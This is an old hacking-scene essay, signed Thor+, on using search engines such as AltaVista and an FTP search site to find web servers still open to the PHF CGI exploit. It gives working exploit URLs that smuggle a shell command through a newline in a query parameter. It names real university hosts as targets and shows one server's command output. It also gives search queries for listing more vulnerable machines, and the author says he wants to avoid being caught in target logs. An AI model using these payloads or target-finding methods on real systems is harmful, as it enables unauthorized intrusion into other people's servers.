Knowledge is knowledge's reward
So what all this is about? Its about Hacking? Don't know i think its
about searching the Net.I'll agree at this point (and many others) with Fravia+ who says in one of his pages that you can find everything on a computer near you (or not) on internet.
I have an example of
searching effectively the net from my personal experience and it is good to
share
it with you HCUkers. Somebody asked to find some computers with the PHF
exploit.
I wanted to test it and see how it works and decide to help him. For you
who
don't know nothing about it
DON'T LET me explain, just make a search for it through regular search
engines
(use your favorite which in my
opinion must support boolean searches) or Search in Fravia+ pages to find
out
about it.
If you don't know how, i must insist: learn how to use the most
important search engines first, come to the cracking/hacking/whatever stuff later :-)
I did it once with
his
site (sorry). Here is the story. I was searching to find something (not
remember
now)
and i was sure that i had read something about this on Fravia's labyrinth
of
pages.
I did a search with altavista (my favorite) adding the keyword
host:www.Fravia.org
and i add
next the string i was
searching
for. What this means is that i asked from a main search
Engine
to search only inside a specific host for the string i was looking for.
Unfortunately my search did'nt fish nothing at all. What do you do then in such cases?
Quit? NO.
Just go to engine's add URL, and add the pages you are interesting to.
After one or two days max perform once more the same search and you'll
have your results.
(You see Fravia+'s laziness sometimes is good because you have to find new ways
to get your job done :-).
Ok. Ok. For you who are lazy enough try simple nomad's www hack faq. (www.nmrc.org)
OOPS! Back to our
subject.
The phf exploit. I tried 5 or 6 URL's with no result, because it is a too
old exploit and many servers (by all means not all :-) have fixed it already...
then i realized it was boring to
do this and i didn't want to get caught, since my IP address will be on numerus
log files on target's computer. But wait a minute... aren't machines born to
serve us?
So i thought
(since i
was looking for a file) i could do an ftp search and see what i'll come
up with.
Try it go to http://ftpsearch.ntnu.no (serach again! Fravia+ pages to see
other
URLs of this search engine. many thanxs to Robin Hood+) and make a search in
phf. When you study the results you begin
thinking.
1. all these servers or some of them maybe have the magical file installed!
2.- most ftp servers
are installed in the same machines with http servers and therefore they
have
the
same name with a little difference we MUST change the ftp portion of the
name
with www.
EXAMPLE
We can see that one of the engines answers was ftp.cs.yale.edu /usr/local/etc/httpd/cgi-bin/phf. Hmmm maybe we can fish out something if we try it, because of the edu URL. They don't dig it too much. Lets try the www location.
I gave the command to
my
Netscape browser http://www.cs.yale.edu/ and i
came up with a Yale Univercity screen.
Oh! Noo. I read: Yale Univercity Computer science department. They probably
have fix it but since we came that far lets give it a try.
I gave the command to
my
Netscape browser http://www.cs.yale.edu/cgi-bin/phf?Qalias=x%0als
And here is the surprise!!. Their server was very kind and friendly
to answer my question. Here is its answer:
/usr/local/bin/ph -m alias=x ls
-515:no non-null key field in query. -515:Initial metas may be used as qualifiers only. 500:Did not understand query. archie calendar cookie cookie.orig csdptwww date finger finger-dist fortune gmt-saytime.au gmt-saytime.au guest-log homepage imagemap info2www jj long lwgate mail mail-feedback nph-test-cgi phf post-query query saynumber.au saytime.au saytime.au search.pl slade src test-cgi test-cgi.tcl test-env uptime view-source wais-ncsa-httpd.pl wais.pl xiao
3.- Back to our thinking
job.
Maybe we can do the same think with a web search. My favorite is digital.
Since we want as he (my friend) said edu domain because they have the
most
possibilities to have it installed,
we give the command domain:edu and the
engine
will search only that domain
4.- Shoot
http://www.altavista.digital.com/cgi-bin/query?
pg=q&what=web&kl=XX&q=domain%3Aedu+%2Bcgi-bin+%2Bphf&search.x=21&search.y=12
5. Begin
search
and you will find diamonds. I tried one or two . If anybody try this one
This one will work and i'm sure others.
http://www.met.tamu.edu/cgi-bin/phf?QAlias=x%0als
6.- Make a
search
in the domain edu and search only the links that reffered to cgi-bin/phf!!!
Is this kool or what!!! Again i'll use digital
http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain%
3Aedu+link%3Acgi-bin%2Fphf&search.x=55&search.y=5
7.- make a
search
without the domain to see what you can find. Still the most are
univercities..(Probably the guy was right)
http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=l
ink%3A cgi-bin%2Fphf&next.x=43&next.y=9
Allright for those who don't know about domain:, host: link: etc press
the next
link
http://www.altavista.digital.com/av/content/help_simple.htmhttp://www.altavista.digital.com/av/content/help_simple.htm
, or read.
What? Offcourse HCU pages. you can find a lot about searching the net. An
other
good tactic is to
read the help files of search engines. There are all in there. in front
of our
eyes. All we have to do is
just press the little button named Help.
SEARCH. Search for Simple Nomad's WEB hack FAQ. Many interesting things in there.
SEARCH. Find GTMHH. Very educational, All about email headers, etc.
Hey ! I
don't give
you these links, because +Orc's tactic is to leave
something for the "student" . Anyway they are the easiest think
to
find.
I want to send my greetings to Aesculapius (where are you lost?). I love this great +Teacher!
Of Course thanx goes to Fravia+ because he made +Orc's dream true.
Thor+
Keep On